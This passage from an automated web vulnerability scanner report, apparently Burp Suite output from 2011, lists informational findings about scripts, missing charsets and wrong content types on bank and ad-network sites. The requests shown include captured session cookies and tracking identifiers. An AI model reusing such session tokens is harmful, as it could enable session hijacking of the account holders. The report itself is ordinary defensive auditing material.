Cookie: BrandReferrer=http%3A//www.tdcanadatrust.com/products-services/banking/index-banking.jsp; mbox=session#1317130064411-279159#1317132430|check#true#1317130630; s_pers=%20s_vnum_d%3D1317186000473%2526vn%253D1%7C1317186000473%3B%20s_vnum_w%3D1317531600477%2526vn%253D1%7C1317531600477%3B%20s_vnum_m%3D1317445200480%2526vn%253D1%7C1317445200480%3B%20s_cmchan%3D%255B%255B'Natural%252520Search'%252C'1317130067485'%255D%252C%255B'Referrers'%252C'1317130108011'%255D%255D%7C1474982908011%3B%20sinvisit_d%3Dtrue%7C1317132370580%3B%20sinvisit_w%3Dtrue%7C1317132370587%3B%20sinvisit_m%3Dtrue%7C1317132370590%3B%20s_nr%3D1317130570597%7C1319722570597%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3Dundefinedwww.tdcanadatrust.comwww.tdcanadatrust.com%3B%20s_sq%3D%3B; sitecontext=48790aaa-b1a4-4884-9226-8425d8c74fcb; com.td.WAWID=easywebsoc.tdcanadatrust.com; JSESSIONID=0000Nfog2DHatDpvl8w5Zw9ZAC4:15aml0faa

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:36:10 GMT
Server: IBM_HTTP_Server
Last-Modified: Mon, 11 Jul 2005 17:48:02 GMT
Content-Length: 318
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CUR DEV PSA PSD CONo TELo ADM TAI OUR LEG PHY ONL UNI FIN CNT PRE GOV PUR NAV INT COM STA"
Keep-Alive: timeout=3, max=100
Connection: Keep-Alive
Content-Type: text/plain
Content-Language: en-US

..............(.......(....... ..............................................................................................."""""""""""""""""""""""""".(..."""./....""./."..""./."/.""./."/.""./."/.""
...[SNIP]...

11.2. https://hackalert.armorize.com/_js/ajaxInterface.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /_js/ajaxInterface.js

Request

GET /_js/ajaxInterface.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:40:18 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Thu, 20 Jan 2011 02:38:17 GMT
ETag: "33a28b-742-49a3e06a57840"
Accept-Ranges: bytes
Content-Length: 1858
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-js

eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return
...[SNIP]...

11.3. https://hackalert.armorize.com/_js/datepicker.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /_js/datepicker.js

Request

GET /_js/datepicker.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:40:18 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Thu, 20 Jan 2011 02:38:17 GMT
ETag: "33a27e-fae-49a3e06a57840"
Accept-Ranges: bytes
Content-Length: 4014
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-js

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){
...[SNIP]...

11.4. https://hackalert.armorize.com/_js/doFx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /_js/doFx.js

Request

GET /_js/doFx.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:40:18 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Thu, 20 Jan 2011 02:38:17 GMT
ETag: "33a28d-4a8-49a3e06a57840"
Accept-Ranges: bytes
Content-Length: 1192
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-js

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){
...[SNIP]...

11.5. https://hackalert.armorize.com/_js/dom-drag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /_js/dom-drag.js

Request

GET /_js/dom-drag.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:40:19 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Thu, 20 Jan 2011 02:38:17 GMT
ETag: "33a291-838-49a3e06a57840"
Accept-Ranges: bytes
Content-Length: 2104
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-js

eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)>35?String.fromCharCode(c+29):c.toString(36))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return
...[SNIP]...

11.6. https://hackalert.armorize.com/_js/mootools.v1.11.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /_js/mootools.v1.11.js

Request

GET /_js/mootools.v1.11.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:40:18 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Thu, 20 Jan 2011 02:38:17 GMT
ETag: "33a286-166f4-49a3e06a57840"
Accept-Ranges: bytes
Content-Length: 91892
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-js

//MooTools, My Object Oriented Javascript Tools. Copyright (c) 2006 Valerio Proietti, <http://mad4milk.net>, MIT Style License.

var MooTools = {
   version: '1.11'
};

function $defined(obj){
   r
...[SNIP]...

11.7. https://hackalert.armorize.com/_js/rc_lang_en.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /_js/rc_lang_en.js

Request

GET /_js/rc_lang_en.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:40:20 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Thu, 20 Jan 2011 02:38:17 GMT
ETag: "33a28a-44b-49a3e06a57840"
Accept-Ranges: bytes
Content-Length: 1099
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-js

var text = new Array();

text['today'] = 'Today';
text['time'] = 'Time';

text['dayNamesShort'] = new Array(
'Sun',
'Mon',
'Tue',
'Wed',
'Thu',
'Fri',
'Sat'
);
text['dayNames'] = new Arr
...[SNIP]...

11.8. https://hackalert.armorize.com/_js/register.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /_js/register.js

Request

GET /_js/register.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/register.php
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:45:31 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Thu, 20 Jan 2011 02:38:17 GMT
ETag: "33a280-a51-49a3e06a57840"
Accept-Ranges: bytes
Content-Length: 2641
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-js

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){
...[SNIP]...

11.9. https://hackalert.armorize.com/_js/rich_calendar.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /_js/rich_calendar.js

Request

GET /_js/rich_calendar.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:40:20 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Thu, 20 Jan 2011 02:38:17 GMT
ETag: "33a27c-9818-49a3e06a57840"
Accept-Ranges: bytes
Content-Length: 38936
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-js

/*==============================================================================

Rich Calendar 1.0
=================

...[SNIP]...

11.10. https://hackalert.armorize.com/_js/tooltips.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /_js/tooltips.js

Request

GET /_js/tooltips.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:40:19 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Thu, 20 Jan 2011 02:38:17 GMT
ETag: "33a279-255-49a3e06a57840"
Accept-Ranges: bytes
Content-Length: 597
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-js

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p
...[SNIP]...

11.11. https://hackalert.armorize.com/_js/usersettings.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /_js/usersettings.js

Request

GET /_js/usersettings.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:40:19 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Thu, 20 Jan 2011 02:38:17 GMT
ETag: "33a288-250-49a3e06a57840"
Accept-Ranges: bytes
Content-Length: 592
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-js

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p
...[SNIP]...

11.12. https://hackalert.armorize.com/_js/windowFx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hackalert.armorize.com
Path:   /_js/windowFx.js

Request

GET /_js/windowFx.js HTTP/1.1
Host: hackalert.armorize.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://hackalert.armorize.com/
Cookie: PHPSESSID=mvo1cqhvtqp54mroj1122v1io59e387e; LanguagePreference=1

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:40:20 GMT
Server: Apache/2.2.13 (Linux/SUSE)
Last-Modified: Thu, 20 Jan 2011 02:38:17 GMT
ETag: "33a28c-1dd-49a3e06a57840"
Accept-Ranges: bytes
Content-Length: 477
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/x-js

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p
...[SNIP]...

11.13. https://www.nbc.ca/WebInfoWeb/DispatchRequest  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.nbc.ca
Path:   /WebInfoWeb/DispatchRequest

Request

GET /WebInfoWeb/DispatchRequest?aliasDispatcher=creditCardComparison&cAliasDispatcher=creditCardComparisonError&action=1901&lang=en&firstCardId=81903&firstCheckBoxName=cardId_81903&cardID_81903=on&secondCardId=81801&secondCheckBoxName=cardId_81801&cardID_81801=on&numberOfCheckedCard=2 HTTP/1.1
Host: www.nbc.ca
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.nbc.ca/bnc/cda/productfamilymc/0,6326,divId-2_langId-1_navCode-2200,00.html?tab=06
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: newCookieBNC=1000; _ongletMC=06

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 27 Sep 2011 13:41:26 GMT
Content-length: 20410
Content-type: text/html; charset=UTF-8
Content-language: en-US
Set-cookie: lang=en; Expires=Sun, 06 Sep 2015 13:38:43 GMT; Path=/


<html>
<head>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8">
   <title>Compare MasterCard credit cards</title>
   <link rel
...[SNIP]...

12. HTML does not specify charset  previous  next
There are 5 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


12.1. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90

Request

GET /2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://tag.admeld.com/ad/iframe/14/nypost/300x250/rtb_tier1?t=1317129837051&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nypost.com%2Fp%2Fnews%2Flocal%2Fcan_be_sued_dsk_Owh4Z6PHwfNp0jLbA5Im1J&refer=http%3A%2F%2Fwww.nypost.com%2F
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATT=TribalFusionB3; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:23:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 521
Content-Type: text/html

<SCRIPT TYPE="text/javascript" language="JavaScript">
var B3d=new Date();
var B3m=B3d.getTime();
B3d.setTime(B3m+30*24*60*60*1000);
document.cookie="VolkswagenBTConq=UndertoneB3;expires="+B3d.toGMTStr
...[SNIP]...

12.2. http://display.digitalriver.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Request

GET /?aid=244&tax=par HTTP/1.1
Host: display.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/linux/addons/?store_id=1&version=10.3.1&os=unix&key=PLSK016485370000
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a; op393dr_homepage_demo1gum=a04e07i0a12794q0634yf92794r0652w9ba67; __utma=94877326.951308031.1315146138.1315146138.1315146138.1; __utmz=94877326.1315146138.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:15:10 GMT
Server: Apache/2.2.9
Expires: Mon, 26 Sep 2011 20:45:10 GMT
Last-Modified: Mon, 26 Sep 2011 20:15:10 GMT
Content-Length: 201
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244&tax=par';
document.getElementsByTagName('head')[0].appendChild(dgt_script);
...[SNIP]...

12.3. http://dm.de.mookie1.com/2/B3DM/2010DM/11185989978@x23  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/11185989978@x23

Request

GET /2/B3DM/2010DM/11185989978@x23?USNetwork/VWBTC_11Q1_UT_Tig_Out_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3

Response

HTTP/1.1 200 OK
Date: Tue, 27 Sep 2011 13:23:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3254
Content-Type: text/html

<html>
<head></head>
<body>
<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substrin
...[SNIP]...

12.4. http://wd.sharethis.com/api/getCount2.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.computerworld.com%2Fs%2Farticle%2F9220295%2FMySQL.com_hacked_to_serve_malware HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware?taxonomyId=17
Cookie: __stid=CqIZrE48YIeMTxMbAzqQAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 26 Sep 2011 20:38:28 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 175

(function(){stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.computerworld.com\/s\/article\/9220295\/MySQL.com_hacked_to_serve_malware"})})();

12.5. http://www.rbcroyalbank.com/_assets-custom/js/ajax_utils.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rbcroyalbank.com
Path:   /_assets-custom/js/ajax_utils.js

Request

GET /_assets-custom/js/ajax_utils.js HTTP/1.1
Host: www.rbcroyalbank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.rbcroyalbank.com/personal.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stylesheetsetting=null; lastviewed=personal

Response

HTTP/1.1 404 Not Found
Date: Tue, 27 Sep 2011 13:27:27 GMT
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 9239

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
   <TITLE>RBC Royal Bank - The requested document could not be found on our web site</TITLE>
   <base href="http://www.r
...[SNIP]...

13. Content type incorrectly stated  previous  next
There are 22 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


13.1. http://display.digitalriver.com/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /?aid=244&tax=par HTTP/1.1
Host: display.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.parallels.com/store/plesk/linux/addons/?store_id=1&version=10.3.1&os=unix&key=PLSK016485370000
Cookie: op537homegum=a00602v02x278vq07r1n88278vq08j393ee8a; op393dr_homepage_demo1gum=a04e07i0a12794q0634yf92794r0652w9ba67; __utma=94877326.951308031.1315146138.1315146138.1315146138.1; __utmz=94877326.1315146138.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 20:15:10 GMT
Server: Apache/2.2.9
Expires: Mon, 26 Sep 2011 20:45:10 GMT
Last-Modified: Mon, 26 Sep 2011 20:15:10 GMT
Content-Length: 201
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//digr.netmng.com/?aid=244&tax=par';
document.getElementsByTagName('head')[0].appendChild(dgt_script);
...[SNIP]...

13.2. https://easywebsoc.tdcanadatrust.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://easywebsoc.tdcanadatrust.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: easywebsoc.tdcanadatrust.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrandReferrer=http%3A//www.tdcanadatrust.com/products-services/banking/index-banking.jsp; mbox=session#1317130064411-279159#1317132430|check#true#1317130630; s_pers=%20s_vnum_d%3D1317186000473%2526vn%253D1%7C1317186000473%3B%20s_vnum_w%3D1317531600477%2526vn%253D1%7C1317531600477%3B%20s_vnum_m%3D1317445200480%2526vn%253D1%7C1317445200480%3B%20s_cmchan%3D%255B%255B'Natural%252520Search'%252C'1317130067485'%255D%252C%255B'Referrers'%252C'1317130108011'%255D%255D%7C1474982908011%3B%20sinvisit_d%3Dtrue%7C1317132370580%3B%20sinvisit_w%3Dtrue%7C1317132370587%3B%20sinvisit_m%3Dtrue%7C1317132370590%3B%20s_nr%3D1317130570597%7C1319722570597%3B; s_sess=%20s_cc%3Dtrue%3B%20c_m%3Dundefinedwww.tdcanadatrust.comwww.tdcanadatrust.com%3B%20s_sq%3D%3B; sitecontext=48790aaa-b1a4-4884-9226-8425d8c74fcb; com.td.WAWID=easywebsoc.tdcanadatrust.com; JSESSIONID=0000Nfog2DHatDpvl8w5Zw9ZAC4:15aml0faa

Response

